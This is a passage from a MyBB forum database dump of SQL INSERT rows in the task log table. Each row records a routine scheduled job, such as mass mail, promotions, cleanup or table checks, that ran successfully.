mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8972', '5', '1349784329', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8971', '7', '1349784029', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('8970', '1', '1349784024', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8969', '3', '1349783951', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8968', '9', '1349783765', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8967', '5', '1349783755', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8966', '9', '1349782916', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8965', '3', '1349782229', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8964', '9', '1349782132', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8963', '5', '1349781920', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8962', '9', '1349781859', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8961', '5', '1349781806', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8960', '7', '1349781786', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('8959', '1', '1349781711', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8958', '3', '1349780960', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8957', '9', '1349780950', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8956', '5', '1349779596', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8955', '9', '1349779304', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8954', '3', '1349778833', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8953', '9', '1349778342', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8952', '5', '1349778313', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8951', '9', '1349777640', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8950', '5', '1349777447', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8949', '7', '1349777443', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('8948', '1', '1349777415', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8947', '3', '1349777364', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8946', '9', '1349777355', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8945', '5', '1349776151', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8944', '3', '1349775821', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8943', '9', '1349775813', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8942', '5', '1349774988', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8941', '9', '1349774051', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8940', '7', '1349774004', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('8939', '1', '1349773997', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8938', '3', '1349773986', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8937', '5', '1349773985', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8936', '9', '1349773653', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8935', '3', '1349771415', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8934', '9', '1349771365', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8933', '5', '1349771358', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8932', '9', '1349770360', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8931', '5', '1349769975', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8930', '7', '1349769639', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('8929', '1', '1349769631', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8928', '3', '1349769548', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8927', '9', '1349769369', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8926', '3', '1349768853', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8925', '9', '1349768851', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8924', '5', '1349768833', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8923', '5', '1349767117', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8922', '7', '1349767113', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('8921', '1', '1349767109', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8920', '3', '1349767071', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8919', '9', '1349767062', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8918', '5', '1349765103', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8917', '9', '1349764901', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8916', '3', '1349764218', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8915', '9', '1349764174', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8914', '5', '1349764189', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8913', '7', '1349764186', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('8912', '1', '1349764180', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8911', '3', '1349764177', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8910', '9', '1349761599', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8907', '11', '1349761011', 'The delayed moderation task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8908', '4', '1349761130', 'The database backup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8909', '9', '1349761152', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9145', '9', '1349844918', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9146', '3', '1349845184', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9147', '1', '1349845235', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9148', '7', '1349845330', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9149', '5', '1349845557', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9150', '9', '1349845955', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9151', '5', '1349846709', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9152', '9', '1349846726', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9153', '3', '1349847014', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9154', '9', '1349847702', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9155', '5', '1349847941', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9156', '9', '1349849052', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9157', '3', '1349849190', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9158', '1', '1349849244', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9159', '7', '1349849260', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9160', '5', '1349849660', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9161', '9', '1349854873', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9162', '5', '1349854877', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9163', '3', '1349856597', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9164', '1', '1349856607', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9165', '7', '1349856709', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9166', '5', '1349856717', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9167', '9', '1349856807', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9168', '5', '1349857620', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9169', '9', '1349860254', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9170', '3', '1349860290', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9171', '5', '1349860304', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9172', '1', '1349860326', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9173', '7', '1349860328', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9174', '5', '1349861214', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9175', '9', '1349861225', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9176', '3', '1349862547', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9177', '9', '1349862598', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9178', '5', '1349862599', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9179', '9', '1349863139', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9180', '3', '1349863146', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9181', '1', '1349863211', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9182', '7', '1349863214', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9183', '5', '1349863552', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9184', '9', '1349863922', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9185', '5', '1349865053', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9186', '9', '1349865062', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9187', '3', '1349865066', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9188', '9', '1349866608', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9189', '5', '1349866620', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9190', '3', '1349866940', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9191', '1', '1349866964', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9192', '7', '1349866971', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9193', '5', '1349867328', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9194', '9', '1349867902', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9195', '5', '1349869517', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9196', '9', '1349869579', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9197', '3', '1349869640', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9198', '9', '1349870114', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9199', '3', '1349870343', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9200', '1', '1349870408', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9201', '4', '1349870415', 'The database backup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9202', '7', '1349870422', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9203', '5', '1349870705', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9204', '9', '1349871273', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9205', '5', '1349872255', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9206', '9', '1349872286', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9207', '3', '1349872291', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9208', '9', '1349872884', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9209', '5', '1349873111', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9210', '9', '1349873910', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9211', '3', '1349873948', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9212', '1', '1349874498', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9213', '7', '1349874503', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9214', '5', '1349874506', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9215', '9', '1349874741', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9216', '5', '1349875761', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9217', '9', '1349875781', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9218', '3', '1349876023', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9219', '9', '1349876421', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9220', '5', '1349876707', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9221', '9', '1349877327', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9222', '3', '1349877563', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9223', '1', '1349877613', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9224', '7', '1349877639', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9225', '5', '1349878059', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9226', '9', '1349878405', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9227', '5', '1349880382', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9228', '9', '1349880406', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9229', '3', '1349880410', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9230', '9', '1349882522', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9231', '3', '1349882526', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9232', '1', '1349882533', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9233', '7', '1349882686', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9234', '5', '1349882698', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9235', '5', '1349882702', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9236', '9', '1349882737', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9237', '3', '1349883001', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9238', '9', '1349883766', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9239', '5', '1349884145', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9240', '9', '1349884842', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9241', '3', '1349884855', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9242', '1', '1349884860', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9243', '7', '1349884881', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9244', '5', '1349885320', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9245', '9', '1349885670', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9246', '5', '1349886721', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9247', '9', '1349886761', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9248', '3', '1349886765', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9249', '9', '1349887211', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9250', '5', '1349887502', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9251', '9', '1349888213', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9252', '3', '1349888366', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9253', '1', '1349888579', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9254', '7', '1349888885', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9255', '5', '1349888888', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9256', '9', '1349891966', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9257', '5', '1349891975', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9258', '3', '1349892103', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9259', '1', '1349892326', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9260', '7', '1349892335', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9261', '5', '1349894508', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9262', '9', '1349895093', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9263', '3', '1349895146', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9264', '5', '1349895154', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9265', '9', '1349895320', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9266', '3', '1349895563', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9267', '1', '1349895642', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9268', '7', '1349895913', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9269', '5', '1349895929', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9270', '9', '1349896445', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9271', '5', '1349897808', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9272', '9', '1349898734', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9273', '3', '1349898751', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9274', '5', '1349898904', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9275', '9', '1349898912', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9276', '3', '1349899396', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9277', '1', '1349899409', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9278', '7', '1349899426', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9279', '5', '1349900639', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9280', '9', '1349901046', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9281', '5', '1349901934', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9282', '3', '1349901973', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9283', '9', '1349902014', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9284', '9', '1349902860', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9285', '3', '1349902862', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9286', '1', '1349902883', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9287', '7', '1349902891', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9288', '5', '1349903559', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9289', '9', '1349903610', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9290', '5', '1349904342', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9291', '9', '1349904373', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9292', '3', '1349904614', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9293', '9', '1349905262', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9294', '5', '1349905919', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9295', '9', '1349906278', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9296', '3', '1349906342', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9297', '1', '1349906417', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9298', '7', '1349907642', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9299', '5', '1349907646', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9300', '9', '1349907652', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9301', '5', '1349908123', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9302', '9', '1349908139', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9303', '3', '1349908497', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9304', '9', '1349908994', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9305', '5', '1349909103', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9306', '9', '1349909854', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9307', '3', '1349909945', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9308', '1', '1349910088', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9309', '7', '1349910095', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9310', '5', '1349910303', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9311', '9', '1349910627', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9312', '5', '1349911577', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9313', '9', '1349911585', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9314', '3', '1349911840', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9315', '9', '1349912462', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9316', '5', '1349913362', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9317', '9', '1349913372', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9318', '3', '1349913613', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9319', '1', '1349913651', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9320', '2', '1349914098', 'The daily cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9321', '7', '1349914101', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9322', '11', '1349914194', 'The delayed moderation task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9323', '5', '1349914196', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9324', '9', '1349914271', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9325', '5', '1349916217', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9326', '9', '1349916229', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9327', '3', '1349916238', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9328', '5', '1349916339', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9329', '9', '1349916953', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9330', '3', '1349917321', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9331', '1', '1349917506', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9332', '7', '1349917508', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9333', '5', '1349917663', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9334', '9', '1349917870', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9335', '5', '1349918784', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9336', '9', '1349918845', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9337', '3', '1349919025', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9338', '9', '1349919617', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9339', '5', '1349919905', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9340', '9', '1349920510', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9341', '3', '1349920776', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9342', '1', '1349920898', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9343', '7', '1349921065', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9344', '5', '1349921102', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9345', '9', '1349921410', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9346', '5', '1349922497', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9347', '9', '1349922598', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9348', '3', '1349922604', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9349', '9', '1349923328', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9350', '5', '1349923513', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9351', '9', '1349924190', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9352', '3', '1349924353', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9353', '1', '1349924410', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9354', '7', '1349924412', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9355', '5', '1349924767', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9356', '9', '1349925024', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9357', '5', '1349926153', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9358', '9', '1349926162', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9359', '3', '1349926338', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9360', '9', '1349927822', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9361', '5', '1349927835', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9362', '3', '1349928048', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9363', '1', '1349928069', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9364', '7', '1349928077', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9365', '5', '1349928359', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9366', '9', '1349928684', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9367', '5', '1349929845', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9368', '9', '1349930122', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9369', '3', '1349930222', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9370', '9', '1349930442', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9371', '5', '1349931131', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9372', '9', '1349933136', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9373', '3', '1349933153', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9374', '1', '1349933164', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9375', '7', '1349933168', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9376', '5', '1349933174', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9377', '3', '1349933680', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9378', '9', '1349936978', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9379', '5', '1349940308', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9380', '3', '1349943065', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9381', '1', '1349943205', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9382', '7', '1349943209', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9383', '9', '1349944654', 'The mass mail task successfully ran.'); INSERT INTO 